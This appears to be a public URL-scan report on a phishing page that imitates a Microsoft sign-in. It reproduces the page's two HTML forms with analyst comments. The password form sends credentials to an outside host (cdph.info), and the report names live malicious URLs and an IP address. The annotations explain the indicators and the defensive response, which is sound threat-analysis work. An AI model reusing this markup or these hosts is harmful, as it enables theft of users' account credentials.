6wepk8impjoqt3uzvo91sa-on.drv.tw
47.254.94.70  Malicious Activity! Public Scan

URL: https://6wepk8impjoqt3uzvo91sa-on.drv.tw/login.com/
Submission Tags: falconsandbox
Submission: On November 26 via api from US — Scanned from DE

Form analysis 2 forms found in the DOM

POST Login.php

<!-- Captured form 1 of 2: the username step of the scanned sign-in page.
     It posts the "username" field (and the hidden-by-style "Kmsi" checkbox) to the relative
     path Login.php. Absent a base element, that resolves under the scanned URL on
     6wepk8impjoqt3uzvo91sa-on.drv.tw, not under any Microsoft origin.
     The form-level onkeypress handler cancels the Enter key so the form is not submitted natively.
     NOTE(review): the ids and classes (loginFormPaginated, userNameArea, kmsiArea) look copied from a
     Microsoft / AD FS paginated sign-in template; confirm against a known-good page before using
     them as a detection signature, since the genuine page would carry the same markup. -->
<form method="post" id="loginFormPaginated" class="paginatedPageForm" autocomplete="off" onkeypress="if (event &amp;&amp; event.keyCode == 13) event.preventDefault();" action="Login.php">
  <div id="formsAuthenticationArea">
    <div id="userNameArea">
      <label id="userNameInputLabel" for="userNameInput" class="hidden">User Account</label>
      <!-- Enter in this field calls paginationManager.validateAndNext(); that script is not part of this capture. -->
      <input id="userNameInput" name="username" type="email" value="" tabindex="1" class="text textPaginated fullWidth" onkeypress="if (event &amp;&amp; event.keyCode == 13) paginationManager.validateAndNext();" spellcheck="false"
        placeholder="someone@example.com" autocomplete="off">
    </div>
    <div id="error" class="fieldMargin error errorUsernamePaginated smallText">
      <span id="errorText" for="" class="errorText" aria-live="assertive" role="alert"></span>
    </div>
    <div id="introduction" class="groupMargin signInIntroduction">
    </div>
    <!-- "Keep me signed in" is present in the DOM but hidden with an inline display:none. -->
    <div id="kmsiArea" class="kmsiAreaPaginated" style="display:none">
      <input type="checkbox" name="Kmsi" id="kmsiInput" value="true" tabindex="2">
      <label for="kmsiInput">Keep me signed in</label>
    </div>
    <div class="form-group" data-bind="
                    htmlWithBindings: html['WF_STR_SignUpLink_Text'],
                    childBindings: {
                        'signup': {
                            href: svr.urlSignUp || '#',
                            ariaLabel: svr.urlSignUp ? str['WF_STR_SignupLink_AriaLabel_Text'] : str['WF_STR_SignupLink_AriaLabel_Generic_Text'],
                            click: signup_onClick } }">No account?
      <!-- This link targets login.live.com with a redirect_uri on login.microsoftonline.com, i.e. genuine
           Microsoft hosts. Presumably it was carried over from the copied template; on its own it is
           not an indicator of compromise and should not be blocked as one. -->
      <a href="https://login.live.com/oauth20_authorize.srf?response_type=code&amp;client_id=51483342-085c-4d86-bf88-cf50c7252078&amp;scope=openid+profile+email+offline_access&amp;response_mode=form_post&amp;redirect_uri=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2ffederation%2foauth2msa&amp;state=rQIIAYWSvW_TUADE46RN0wragirUBdSBASE5ef6IY0dicPKaxE1sx3Fc4yyR7TjJcxPbddy08dINMZYBhrKxUQmEOgFTJ5A6de7MgJCQEBMjKf8Ay51Od9vvVpaYLJsFWfA4RWSJ4kOaovNmweJwzmQonOYIgJs0yeBUnmIoEhC9PKDCuyvra5_ebv6sH1eefRlcRO9qp6fYcneEpk7W9sdn2INhFAWTYi53eHiY9ft9ZP8rciPT6yFv8BHDrjDsO4adJhcdD9fUs-SEoQoMBWia5jiWYGnA0FmxKo1lqBFGbEcSadCyCoAx3gYNvTLquEpk6AYptZW8qGtAbO8iqSrOOvrcYy0yYiWWyvN9vDOe75EYi1GnbVNiPEJiVZiJ423iOrkm8wfRkLwRP0Sx8zu53PfDcTfwJ9Fp6lXSDJmKwsMhGVZwgbf5cbtqyopMEsgpy3lX3dMKbqs86tOSOpuW6HI4Q5qsRnZdB_to21PV0CN2Jk4QN4FY41tHmmENedwVBEuyKE1uqSVOd1vi7CmoeI4Fa5QBu47korI76wlNfcrXG3t79XqnkQdQ03umZwezvaCyM0dk25N-rc7CZswdiPpsQE1285aLhu2DWketWiY_aE6niO3QHgLdHlcyHKgJngKPQIlqNDqErJSPGKud75L9-r4f4AXQCPHphA0VgYc4qcgc45tQwH3Gcn3LFng_hl2iVRDsw_NUeg5z7HuXqVU_cDzU2wpCv49GztUC9mPhXia9ntlMbCUebYBUMZNZWU_cpD8L2JvF-XNevxzcP_96XDt78T66-LaauFzMQcWk4v0CDQvOqMkMlQCWGE-kwspUDo4cNMgdsHCHaARySXlCFYmTNHaSTl-m7wiwK2231TYvQb4FyS74lcaeLyU-L__nf9crGyQgCRwUcJLdAnSRZosE1_lwC7u4nfgL0&amp;estsfed=1&amp;uaid=18a9b90f4bed467f86c667c074ad489a&amp;signup=1&amp;lw=1&amp;fl=easi2&amp;fci=4345a7b9-9a63-4910-a426-35363201d503&amp;mkt=en-US" id="signup" aria-label="Create a Microsoft account">Create one!</a><br><br>
    </div>
    <!-- The two markers below are Knockout containerless-binding comments. Within this captured form
         the first closes a block that was never opened and the second opens one that is never closed. -->
    <!-- /ko -->
    <!-- ko if: showCantAccessAccountLink -->
    <div class="form-group">
      <!-- The static href is "#": as captured, this recovery link leads nowhere unless a script
           (not shown) rewrites it through the data-bind expression. -->
      <a id="cantAccessAccount" name="cannotAccessAccount" data-bind="
                        text: str['WF_STR_CantAccessAccount_Text'],
                        click: accessRecoveryLink ? null : cantAccessAccount_onClick,
                        attr: { target: accessRecoveryLink &amp;&amp; '_blank' },
                        href: accessRecoveryLink || '#'" href="#">Can't access your account?</a>
    </div>
  </div>
</form>

POST https://cdph.info/n/next.php

<!-- Captured form 2 of 2: the password step.
     The action is the absolute URL https://cdph.info/n/next.php, a different host from the scanned
     page (6wepk8impjoqt3uzvo91sa-on.drv.tw) and from the Microsoft brand shown to the user, so every
     submitted field leaves the hosting site. This cross-host form action is the strongest indicator
     on the page.
     Fields sent on submit: username (hidden), Kmsi (hidden), AuthMethod=FormsAuthentication (hidden)
     and password.
     Defensive use: treat any credentials entered here as exposed (reset the password, revoke
     sessions) and search proxy / DNS logs for requests to the action host. -->
<form method="post" id="loginForm" autocomplete="off" class="paginatedPageForm" novalidate="novalidate" onkeypress="if (event &amp;&amp; event.keyCode == 13) return Login.submitLoginRequest();" action="https://cdph.info/n/next.php">
  <!-- Both holders are empty in the captured markup. Presumably a script copies the values from the
       username form into them before submit; that script is not part of this capture. -->
  <input id="userNameInputHolder" name="username" value="" type="hidden">
  <input id="kmsiHolder" name="Kmsi" value="" type="hidden">
  <input id="formsAuthMethod" type="hidden" name="AuthMethod" value="FormsAuthentication">
  <div id="passwordArea">
    <label id="passwordInputLabel" for="passwordInput" class="hidden">Password</label>
    <input id="passwordInput" name="password" type="password" tabindex="1" class="text textPaginated fullWidth" placeholder="Password" autocomplete="off">
  </div>
  <div class="form-group">
    <!-- This link targets passwordreset.microsoftonline.com, a genuine Microsoft host. Like the sign-up
         link in the username form it is not an indicator by itself. -->
    <a id="idA_PWD_ForgotPassword" role="link" href="https://passwordreset.microsoftonline.com/?ru=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2freprocess%3fctx%3drQIIAYWSO2_TUACF46RN00q0BSHUBdSBASE5uX7EiSMxOLl5uIntOLYxzhLZjpPYSWzXcR720g0xlgGGsrFRCYZOwNQJpE6dmRkQEhJiYiT9BSzn6Ejf9p2dLSpbzIIseJzCsljpIUmQeb1g0CitUwRK0hhAdRKnUCJPUAQOsH4eEMGdnf29T-8OfjVPas-_DC_D942zc-TBKAz9WSmXWy6XWW8wsE0ra3rT3ER3-7Y7_Igg1wjyA0HOkpuWiyrSeXJGEQWKACRJ0nQRK5KAIrNcnZ8KUMG02Ax5XCMFCQBtWgUttTbpOmKoqRrOy2KeUxXAyU9tvs5FXXXdsRJqsRjzlTUfH03XvM3FXNiVTYKLJzZXZyNuWsW-JfcEZh6O8JvwAju2_iS3B14w7fneLDxLvU7qAVUTGTjCgxrKMiYzleu6IAo4ZlsVIe9IY6XgdCqTAclL0aJMVoLIVgQpNJsqOLarriQFLnY0s_y4DbgG01kpmjFiUIdlDd4gFKEjlWnV6XDRM1BzLQM2CA32LN6xK07UZ9vqgmm2xuNms9vKA6iofd01_Wjs147WWkxzNmg0i7Ad03NOjYbE7GnecOyRPG90pbqhM8P2YmEXu6Rrg16fLmsWVFhXhCtQJlqtLiaIlRVlyPkePmgeez5aAK0AXcyKgcgyEMVFgaY8HbKoRxmOZ5gs48Wwh3UKrLm8SKXXMqeee5Xa9XzLtfuHfuAN7Il1vYH83LiXSe9nDhKHiUd3QaqUyezsJ27W3w3k7eb6LW9eDe9ffD1pnL_8EF5-301cbeagqBPxcYGEBWvSpkaiD8uUyxFBbSH4K8se5uZFeIS1fKEsPiFK2GkaOU2nr9K3Wdjjq7IkMzxkOhDvgd9p5MVW4vP2f_53eSvxDw2&amp;mkt=en-US&amp;hosted=0&amp;device_platform=Windows+10" data-bind="
                            text: str['CT_PWD_STR_ForgotPwdLink_Text'],
                            href: accessRecoveryLink || svr.urlResetPassword,
                            attr: { target: accessRecoveryLink &amp;&amp; '_blank' },
                            click: accessRecoveryLink ? null : resetPassword_onClick">Forgot my password</a>
  </div>
  <!-- The submit control is a span with role="button", not a native button. Both its click and its
       Enter/Space key handlers call Login.submitLoginRequest(), which is defined outside this
       capture; without that script the form has no native submit control. -->
  <span id="submitButton" class="submit submitPaginated" tabindex="3" role="button" onkeypress="if (event &amp;&amp; (event.keyCode == 32 || event.keyCode == 13)) Login.submitLoginRequest();" onclick="return Login.submitLoginRequest();">Sign
    in</span>
</form>

Text Content

JAVASCRIPT REQUIRED

JavaScript is required. This web browser does not support JavaScript or
JavaScript in this web browser is not enabled.

To find out if your web browser supports JavaScript or to enable JavaScript, see
web browser help.

Sign in with microsoft account
User Account


Keep me signed in
No account? Create one!


Can't access your account?
Next
Password
Forgot my password
Sign in


© 2018 Microsoft